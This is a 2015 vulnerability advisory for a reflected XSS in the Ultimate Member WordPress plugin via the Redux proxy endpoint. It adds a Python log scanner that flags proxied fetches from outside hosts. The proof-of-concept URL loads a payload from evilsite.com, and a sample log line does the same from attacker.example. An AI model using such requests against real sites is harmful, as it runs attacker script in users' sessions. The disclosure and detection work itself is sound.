Ultimate Member 1.2.98-1.2.997, Reflected XSS
The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as an HTTP proxy. Using this script, it is possible to trigger a Reflected XSS attack by loading data from a location controlled by the attacker. The data fetched from that location is then output on the target domain, and as such any JavaScript it contains is executed in the context of the current user of the site.
Homepage
https://wordpress.org/plugins/ultimate-member/
CVSS Score
5.8
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 1.3.0
Proof of Concept
If a user of the target site can be tricked into visiting the following URL (where the page specified in the ‘url’ parameter contains the XSS payload), the HTML/JS within that page will be executed in the context of the current user.
http://localhost/wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html
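The vulnerability described above and its proof of concept boil down to one observable pattern in web-server access logs: a request for `admin-ajax.php` with `action=redux_p` whose `url` parameter points at a host other than the site itself. The following detection script is an added example, not code from the advisory or from the Ultimate Member or Redux projects; the log lines, the `ALLOWED_HOSTS` allowlist and the `attacker.example` host are constructed for illustration.

```python
"""Flag access-log requests that match the Redux proxy pattern
(admin-ajax.php?action=redux_p&url=...) when the url parameter points at
a host outside the site's own allowlist. Added example; all sample data
below is constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hosts the proxy endpoint may legitimately be asked to fetch from
# (constructed assumption; in practice this is the site's own hostnames).
ALLOWED_HOSTS = {"localhost", "www.example.com"}

# Apache/nginx "combined" log format: client - - [timestamp] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def proxied_external_url(request_target):
    """Return the external URL the proxy was asked to fetch, or None.

    Matches requests for wp-admin/admin-ajax.php whose query string carries
    action=redux_p and a url= value whose host is not in ALLOWED_HOSTS.
    """
    parts = urlsplit(request_target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query)
    if "redux_p" not in qs.get("action", []):
        return None
    for raw in qs.get("url", []):
        target = unquote(raw)  # parse_qs decoded once; handle a double-encoded value too
        host = urlsplit(target).hostname
        if host and host.lower() not in ALLOWED_HOSTS:
            return target
    return None


def scan_log(lines):
    """Return a list of (client, timestamp, external_url) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-format line
        ext = proxied_external_url(m.group("target"))
        if ext is not None:
            hits.append((m.group("client"), m.group("ts"), ext))
    return hits


# Constructed sample log: one normal page view, one benign same-host proxy fetch,
# one unrelated admin-ajax action, and one proxy fetch from an external host.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jun/2015:10:14:50 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Jun/2015:10:16:01 +0000] "GET /wp-admin/admin-ajax.php?action=redux_p&url=http://localhost/wp-content/themes/x/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jun/2015:10:16:30 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jun/2015:10:17:32 +0000] "GET /wp-admin/admin-ajax.php?action=redux_p&url=http%3A%2F%2Fattacker.example%2Fxss-payload.html HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, ts, url in scan_log(SAMPLE_LOG):
        print(f"[{ts}] {client} used the Redux proxy to fetch external content: {url}")
```

Matching on the proxied host rather than on payload keywords keeps the rule robust to encoding tricks in the fetched page, since the page content never appears in the log; only the `url` value does. Run it against the log window around the timeline dates above, or feed the same predicate into a WAF rule that blocks `action=redux_p` requests whose `url` host is not on the allowlist until the plugin is updated to 1.3.0.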
Timeline
- 2015-05-18: Discovered
- 2015-05-18: Vendor notified
- 2015-05-18: Vendor responded
- 2015-06-11: Version 1.2.996 released – issue resolved
- 2015-06-18: Advisory released
- 2015-06-22: Notified that issue has in fact not been resolved – Vendor notified
- 2015-07-07: Version 1.3.0 released – issue resolved (Redux framework updated)